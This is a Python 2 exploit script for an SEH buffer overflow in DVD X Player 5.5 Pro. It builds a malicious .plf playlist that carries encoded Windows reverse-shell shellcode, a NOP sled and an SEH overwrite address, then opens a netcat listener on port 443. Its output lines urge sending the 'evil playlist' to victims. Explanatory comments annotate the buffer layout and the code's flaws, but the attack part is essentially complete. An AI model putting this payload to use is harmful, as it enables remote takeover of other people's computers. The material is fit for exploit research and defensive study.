#!/usr/bin/python
#
#[+]Exploit Title: DVD X Player 5.5 Pro - Playlist file Overflow Exploit
#[+]Date: 01\07\2013
#[+]Authors: Paulo Monteiro e Mario Candeias
#[+]Vendor Homepage: http://www.dvd-x-player.com/
#[+]Version: 1.00
#[+]Tested On: Windows XP SP2 English with Backtrack 5 R3
#[+]CVE: N/A
#

import sys, os

def sploit(file_name):
    """Write a crafted ``.plf`` playlist to ``file_name`` and then block on a netcat listener.

    The file is a fixed 2000-byte buffer (608 filler bytes, a 4-byte nSEH, a
    4-byte SEH overwrite address, then a NOP sled + payload padded to 1384
    bytes; see the layout comments below).  After writing the file the
    function calls ``nc -lvp 443`` and does not return until that process
    exits.  All errors, including those raised while writing, are swallowed
    by the bare ``except`` at the bottom and reported only on stdout.

    NOTE: this script uses Python 2 ``print`` statements; it does not run
    unmodified under Python 3.

    Args:
        file_name: path of the playlist file to create (opened in text mode,
            so on Windows ``\\x0a`` bytes in the buffer would be translated;
            the generator command below already excludes ``\\x0A``/``\\x0D``).

    Returns:
        None.  Failure is signalled only by the "Error creating file..." line.
    """
    # ``filename`` is just an alias for the parameter; both names are used below.
    filename = file_name
    
    #-----------------------------    
    #msfpayload windows/shell_reverse_tcp LHOST=192.168.2.140 LPORT=443 R| msfencode -b '\x00\x0A\x0D\x1A' -t c
    #-----------------------------
    # Opaque payload bytes as emitted by the generator command above; the
    # address and port in that command are baked into these bytes and are not
    # parameterised anywhere in this script.  The listener port on the
    # os.system line below (443) matches the LPORT shown in the command.
    shellcode = ("\xda\xc1\xd9\x74\x24\xf4\x5f\xba\x41\x98\x42\xc2\x2b\xc9\xb1"
    "\x4f\x31\x57\x19\x83\xef\xfc\x03\x57\x15\xa3\x6d\xbe\x2a\xaa"
    "\x8e\x3f\xab\xcc\x07\xda\x9a\xde\x7c\xae\x8f\xee\xf7\xe2\x23"
    "\x85\x5a\x17\xb7\xeb\x72\x18\x70\x41\xa5\x17\x81\x64\x69\xfb"
    "\x41\xe7\x15\x06\x96\xc7\x24\xc9\xeb\x06\x60\x34\x03\x5a\x39"
    "\x32\xb6\x4a\x4e\x06\x0b\x6b\x80\x0c\x33\x13\xa5\xd3\xc0\xa9"
    "\xa4\x03\x78\xa6\xef\xbb\xf2\xe0\xcf\xba\xd7\xf3\x2c\xf4\x5c"
    "\xc7\xc7\x07\xb5\x16\x27\x36\xf9\xf4\x16\xf6\xf4\x05\x5e\x31"
    "\xe7\x70\x94\x41\x9a\x82\x6f\x3b\x40\x07\x72\x9b\x03\xbf\x56"
    "\x1d\xc7\x59\x1c\x11\xac\x2e\x7a\x36\x33\xe3\xf0\x42\xb8\x02"
    "\xd7\xc2\xfa\x20\xf3\x8f\x59\x49\xa2\x75\x0f\x76\xb4\xd2\xf0"
    "\xd2\xbe\xf1\xe5\x64\x9d\x9d\xca\x5a\x1e\x5e\x45\xed\x6d\x6c"
    "\xca\x45\xfa\xdc\x83\x43\xfd\x23\xbe\x33\x91\xdd\x41\x43\xbb"
    "\x19\x15\x13\xd3\x88\x16\xf8\x23\x34\xc3\xae\x73\x9a\xbc\x0e"
    "\x24\x5a\x6d\xe6\x2e\x55\x52\x16\x51\xbf\xe5\x11\xc6\x80\x5e"
    "\x9f\x9b\x69\x9d\x9f\xa2\xd2\x28\x79\xce\x34\x7d\xd2\x67\xac"
    "\x24\xa8\x16\x31\xf3\x38\xba\xa0\x98\xb8\xb5\xd8\x36\xef\x92"
    "\x2f\x4f\x65\x0f\x09\xf9\x9b\xd2\xcf\xc2\x1f\x09\x2c\xcc\x9e"
    "\xdc\x08\xea\xb0\x18\x90\xb6\xe4\xf4\xc7\x60\x52\xb3\xb1\xc2"
    "\x0c\x6d\x6d\x8d\xd8\xe8\x5d\x0e\x9e\xf4\x8b\xf8\x7e\x44\x62"
    "\xbd\x81\x69\xe2\x49\xfa\x97\x92\xb6\xd1\x13\xa2\xfc\x7b\x35"
    "\x2b\x59\xee\x07\x36\x5a\xc5\x44\x4f\xd9\xef\x34\xb4\xc1\x9a"
    "\x31\xf0\x45\x77\x48\x69\x20\x77\xff\x8a\x61")

    # 20-byte NOP sled in front of the payload.
    evil = "\x90"*20 + shellcode

    #-----------------------------------------
    #buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "\x42" * (1384-len(evil))
    #buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61617619] + "D"*1384
    #buffer = "A"*608 + [nSEH - EB 06] + [SEH - 0x61603173] + "D"*1384
    #-----------------------------------------
    # Layout (per the commented variants above): 608 x 'A' filler, 4-byte nSEH
    # ("\xEB\x06" short jump + 2 NOPs), 4-byte SEH overwrite written
    # little-endian (0x61603173), then ``evil`` padded with 'B' to 1384 bytes.
    # Total length is always 608 + 4 + 4 + 1384 = 2000 bytes.  NOTE: if
    # len(evil) ever exceeds 1384 the multiplier goes negative and Python
    # yields '' for the padding, so the file would silently grow past 2000
    # bytes with no error.
    buffer = "\x41"*608 + "\xEB\x06\x90\x90" + "\x73\x31\x60\x61" + evil + "\x42" * (1384-len(evil))
    #create exploit file
    try:    
        print "Creating Evil Playlist ["+file_name+"]...\n"
        # Text mode, no context manager: on an exception between open() and
        # close() the handle is only released by garbage collection.
        textfile = open(filename, 'w')
        textfile.write(buffer)
        textfile.close()
        #open listener shell on port 443
        print "[-] You can now send the evil playlist to your(s) victim(s)!\n"
        print "[-] Waiting victim connection...\n"
        # Blocks until the nc process exits; the nc return code is discarded,
        # and nc being absent from PATH is not reported as an error here.
        os.system("nc -lvp 443")

    # Bare except catches BaseException, so KeyboardInterrupt and SystemExit
    # are also swallowed and reported as a file-creation error.  The original
    # exception is not logged anywhere.
    except:
        print "Error creating file...\n"
 
if __name__ == '__main__':
    # Exactly one positional argument is expected: the output playlist path.
    # A missing argument prints the usage line and exits with status 0.
    if len(sys.argv) >= 2:
        file_name = sys.argv[1]
        sploit(file_name)
    else:
        print "\nUsage: dvdxpro_final.py <filename.plf> \n"
        sys.exit()
